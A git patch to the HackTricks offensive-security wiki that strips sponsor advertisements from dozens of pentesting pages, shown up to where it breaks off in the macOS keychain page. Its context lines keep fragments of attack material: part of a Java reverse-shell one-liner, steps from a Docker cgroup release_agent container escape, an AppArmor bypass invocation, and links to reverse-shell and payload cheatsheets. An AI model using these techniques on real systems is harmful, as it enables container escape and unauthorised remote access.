From 10f210fafaf56b71ef321c0bfdf6a84566c56a24 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Wed, 4 Sep 2024 14:44:38 +0200 Subject: [PATCH] update --- README.md | 34 ------------------- .../hash-length-extension-attack.md | 23 ------------- crypto-and-stego/stego-tricks.md | 14 -------- .../file-data-carving-recovery-tools.md | 14 -------- .../file-data-carving-recovery-tools.md | 14 -------- .../pcap-inspection/dnscat-exfiltration.md | 12 ------- .../pcap-inspection/wireshark-tricks.md | 25 -------------- .../exfiltration.md | 14 -------- .../wide-source-code-search.md | 14 -------- .../python/bypass-python-sandboxes/README.md | 13 ------- .../reverse-shells/linux.md | 14 -------- .../reverse-shells/windows.md | 13 ------- .../threat-modeling.md | 24 ------------- .../tunneling-and-port-forwarding.md | 16 --------- .../escaping-from-gui-applications.md | 20 ----------- .../linux-environment-variables.md | 13 ------- .../pam-pluggable-authentication-modules.md | 24 ------------- .../docker-security/apparmor.md | 26 -------------- .../docker-release_agent-cgroups-escape.md | 25 -------------- .../macos-red-teaming/macos-keychain.md | 24 ------------- .../README.md | 25 -------------- .../macos-memory-dumping.md | 24 ------------- .../macos-security-protections/macos-sip.md | 24 ------------- .../macos-users.md | 13 ------- .../android-applications-basics.md | 14 -------- .../android-task-hijacking.md | 13 ------- .../make-apk-accept-ca-certificate.md | 8 ----- .../reversing-native-libraries.md | 24 ------------- mobile-pentesting/android-checklist.md | 15 -------- mobile-pentesting/ios-pentesting-checklist.md | 14 -------- .../frida-configuration-in-ios.md | 25 -------------- .../1723-pentesting-pptp.md | 13 ------- .../1883-pentesting-mqtt-mosquitto.md | 24 ------------- .../2375-pentesting-docker.md | 24 ------------- .../43-pentesting-whois.md | 14 -------- .../49-pentesting-tacacs+.md | 13 ------- .../7-tcp-udp-pentesting-echo.md | 14 -------- .../ipsec-ike-vpn-pentesting.md | 13 ------- .../pentesting-ftp/README.md | 17 ---------- .../pentesting-ftp/ftp-bounce-attack.md | 14 -------- .../pentesting-imap.md | 14 -------- network-services-pentesting/pentesting-irc.md | 24 ------------- .../README.md | 15 +------- network-services-pentesting/pentesting-pop.md | 12 ------- .../pentesting-smb/rpcclient-enumeration.md | 14 -------- .../basic-voip-protocols/README.md | 25 -------------- .../electron-desktop-apps/README.md | 25 -------------- .../iis-internet-information-services.md | 26 -------------- .../pentesting-web/php-tricks-esp/php-ssrf.md | 14 -------- .../pentesting-web/tomcat.md | 14 -------- .../pentesting-web/tomcat/README.md | 13 ------- .../tomcat/basic-tomcat-info.md | 13 ------- pentesting-web/2fa-bypass.md | 24 ------------- pentesting-web/bypass-payment-process.md | 14 -------- pentesting-web/captcha-bypass.md | 3 -- .../client-side-template-injection-csti.md | 23 ------------- ...g-and-directory-interface-and-log4shell.md | 13 ------- .../express-prototype-pollution-gadgets.md | 25 -------------- ..._stream_prefer_studio-+-path-disclosure.md | 26 -------------- .../lfi2rce-via-nginx-temp-files.md | 26 +------------- ...ula-csv-doc-latex-ghostscript-injection.md | 13 ------- pentesting-web/h2c-smuggling.md | 14 -------- pentesting-web/hacking-with-cookies/README.md | 12 ------- .../postmessage-vulnerabilities/README.md | 24 ------------- .../registration-vulnerabilities.md | 24 ------------- .../cloud-ssrf.md | 14 -------- .../url-format-bypass.md | 13 ------- .../el-expression-language.md | 26 -------------- .../unicode-normalization.md | 26 -------------- .../xs-search/css-injection/README.md | 13 ------- .../abusing-service-workers.md | 14 -------- .../some-same-origin-method-execution.md | 14 -------- physical-attacks/physical-attacks.md | 26 -------------- reversing/common-api-used-in-malware.md | 14 -------- .../reversing-tools-basic-methods/README.md | 14 -------- stego/stego-tricks.md | 14 -------- todo/hardware-hacking/uart.md | 25 -------------- todo/radio-hacking/flipper-zero/README.md | 14 -------- todo/radio-hacking/flipper-zero/fz-sub-ghz.md | 13 ------- todo/radio-hacking/proxmark-3.md | 15 -------- .../checklist-windows-privilege-escalation.md | 14 -------- .../lateral-movement/dcom-exec.md | 14 -------- .../access-tokens.md | 24 ------------- .../integrity-levels.md | 25 -------------- .../juicypotato.md | 25 -------------- .../roguepotato-and-printspoofer.md | 25 -------------- 86 files changed, 2 insertions(+), 1551 deletions(-) diff --git a/README.md b/README.md index e624f87a5..817a22531 100644 --- a/README.md +++ b/README.md @@ -87,29 +87,6 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to *** -### [SerpApi](https://serpapi.com/) - -
- -SerpApi offers fast and easy real-time APIs to **access search engine results**. They scrape search engines, handle proxies, solve captchas, and parse all rich structured data for you. - -A subscription to one of SerpApi’s plans includes access to over 50 different APIs for scraping different search engines, including Google, Bing, Baidu, Yahoo, Yandex, and more.\ -Unlike other providers, **SerpApi doesn’t just scrape organic results**. SerpApi responses consistently include all ads, inline images and videos, knowledge graphs, and other elements and features present in the search results. - -Current SerpApi customers include **Apple, Shopify, and GrubHub**.\ -For more information check out their [**blog**](https://serpapi.com/blog/)**,** or try an example in their [**playground**](https://serpapi.com/playground)**.**\ -You can **create a free account** [**here**](https://serpapi.com/users/sign\_up)**.** - -*** - -### [Try Hard Security Group](https://discord.gg/tryhardsecurity) - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ### [WebSec](https://websec.nl/)
@@ -124,17 +101,6 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.** {% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} ## License & Disclaimer diff --git a/crypto-and-stego/hash-length-extension-attack.md b/crypto-and-stego/hash-length-extension-attack.md index 9158fb48f..8220c9252 100644 --- a/crypto-and-stego/hash-length-extension-attack.md +++ b/crypto-and-stego/hash-length-extension-attack.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -#### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Summary of the attack @@ -62,17 +49,7 @@ If an attacker wants to append the string "append" he can: You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) -#### [WhiteIntel](https://whiteintel.io) -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/crypto-and-stego/stego-tricks.md b/crypto-and-stego/stego-tricks.md index d927b6ce5..79aa7ee91 100644 --- a/crypto-and-stego/stego-tricks.md +++ b/crypto-and-stego/stego-tricks.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## **Extracting Data from Files** ### **Binwalk** @@ -238,12 +230,6 @@ For translating Braille, the [Branah Braille Translator](https://www.branah.com/ * [**https://0xrick.github.io/lists/stego/**](https://0xrick.github.io/lists/stego/) * [**https://github.com/DominicBreuker/stego-toolkit**](https://github.com/DominicBreuker/stego-toolkit) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index 856945611..59d76abb3 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Carving & Recovery tools More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) @@ -113,12 +105,6 @@ Download [here](https://sourceforge.net/projects/findaes/). You can use [**viu** ](https://github.com/atanunq/viu)to see images from the terminal.\ You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index 82986c495..b8bde6c71 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Carving & Recovery tools More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) @@ -113,12 +105,6 @@ Download [here](https://sourceforge.net/projects/findaes/). You can use [**viu** ](https://github.com/atanunq/viu)to see images from the terminal.\ You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md index 4a3a45e90..855b88522 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -15,19 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -#### [WhiteIntel](https://whiteintel.io) -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content. diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 3edc2a068..2566f2937 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Improve your Wireshark skills @@ -181,18 +168,6 @@ f.write(all_bytes) f.close() ``` -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index 159da2b1d..e013b90d0 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Commonly whitelisted domains to exfiltrate information Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused @@ -385,12 +377,6 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index ab7287bcf..84a974045 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - The goal of this page is to enumerate **platforms that allow to search for code** (literal or regex) in across thousands/millions of repos in one or more platforms. This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns. @@ -37,12 +29,6 @@ This helps in several occasions to **search for leaked information** or for **vu When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index 052bf9abf..175cda5ae 100644 --- a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - These are some tricks to bypass python sandbox protections and execute arbitrary commands. ## Command Execution Libraries @@ -1126,11 +1118,6 @@ will be bypassed * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html) * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/generic-methodologies-and-resources/reverse-shells/linux.md b/generic-methodologies-and-resources/reverse-shells/linux.md index 4747f77d7..0c9b10f91 100644 --- a/generic-methodologies-and-resources/reverse-shells/linux.md +++ b/generic-methodologies-and-resources/reverse-shells/linux.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - **If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com) ## Full TTY @@ -399,12 +391,6 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new * [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/) * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/generic-methodologies-and-resources/reverse-shells/windows.md b/generic-methodologies-and-resources/reverse-shells/windows.md index f9108a08d..51429fe8a 100644 --- a/generic-methodologies-and-resources/reverse-shells/windows.md +++ b/generic-methodologies-and-resources/reverse-shells/windows.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Lolbas The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Windows like [https://gtfobins.github.io/](https://gtfobins.github.io/) is for linux.\ @@ -583,12 +575,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive * [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/) * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) * [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) -​ -**Try Hard Security Group** -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/generic-methodologies-and-resources/threat-modeling.md b/generic-methodologies-and-resources/threat-modeling.md index 09c18d5ff..9ca35974f 100644 --- a/generic-methodologies-and-resources/threat-modeling.md +++ b/generic-methodologies-and-resources/threat-modeling.md @@ -1,18 +1,5 @@ # Threat Modeling -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Threat Modeling @@ -124,14 +111,3 @@ Now your finished model should look something like this. And this is how you mak This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack. -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} diff --git a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md index 85bd03cfc..18c521278 100644 --- a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md +++ b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Nmap tip {% hint style="warning" %} @@ -622,14 +614,6 @@ tunnels: * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) * [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/hardware-physical-access/escaping-from-gui-applications.md b/hardware-physical-access/escaping-from-gui-applications.md index acb1f8344..a22b16e33 100644 --- a/hardware-physical-access/escaping-from-gui-applications.md +++ b/hardware-physical-access/escaping-from-gui-applications.md @@ -15,17 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -#### [WhiteIntel](https://whiteintel.io) -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} --- @@ -302,17 +292,7 @@ These shortcuts are for the visual settings and sound settings, depending on the * [https://thesweetsetup.com/best-ipad-keyboard-shortcuts/](https://thesweetsetup.com/best-ipad-keyboard-shortcuts/) * [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html) -#### [WhiteIntel](https://whiteintel.io) -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/linux-hardening/linux-environment-variables.md b/linux-hardening/linux-environment-variables.md index 89f8444e0..06bfb0fe3 100644 --- a/linux-hardening/linux-environment-variables.md +++ b/linux-hardening/linux-environment-variables.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Global variables The global variables **will be** inherited by **child processes**. @@ -142,11 +134,6 @@ One background job, one stopped and last command didn't finish correctly: ![](<../.gitbook/assets/image (715).png>) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md index 399cdaa7a..88d59fe50 100644 --- a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md +++ b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -#### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ### Basic Information @@ -79,17 +66,6 @@ In a setup with multiple auth modules, the process follows a strict order. If th * [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434) -#### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/linux-hardening/privilege-escalation/docker-security/apparmor.md b/linux-hardening/privilege-escalation/docker-security/apparmor.md index cf9bdb36d..fb78110d3 100644 --- a/linux-hardening/privilege-escalation/docker-security/apparmor.md +++ b/linux-hardening/privilege-escalation/docker-security/apparmor.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - ## Basic Information AppArmor is a **kernel enhancement designed to restrict the resources available to programs through per-program profiles**, effectively implementing Mandatory Access Control (MAC) by tying access control attributes directly to programs instead of users. This system operates by **loading profiles into the kernel**, usually during boot, and these profiles dictate what resources a program can access, such as network connections, raw socket access, and file permissions. @@ -321,18 +307,6 @@ chmod +x /tmp/test.pl /tmp/test.pl ``` -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md index 3841b25eb..bb5bc5fa1 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** **For further details, refer to the** [**original blog post**](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)**.** This is just a summary: @@ -85,18 +72,6 @@ chmod a+x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/macos-hardening/macos-red-teaming/macos-keychain.md b/macos-hardening/macos-red-teaming/macos-keychain.md index 451440365..612042e31 100644 --- a/macos-hardening/macos-red-teaming/macos-keychain.md +++ b/macos-hardening/macos-red-teaming/macos-keychain.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
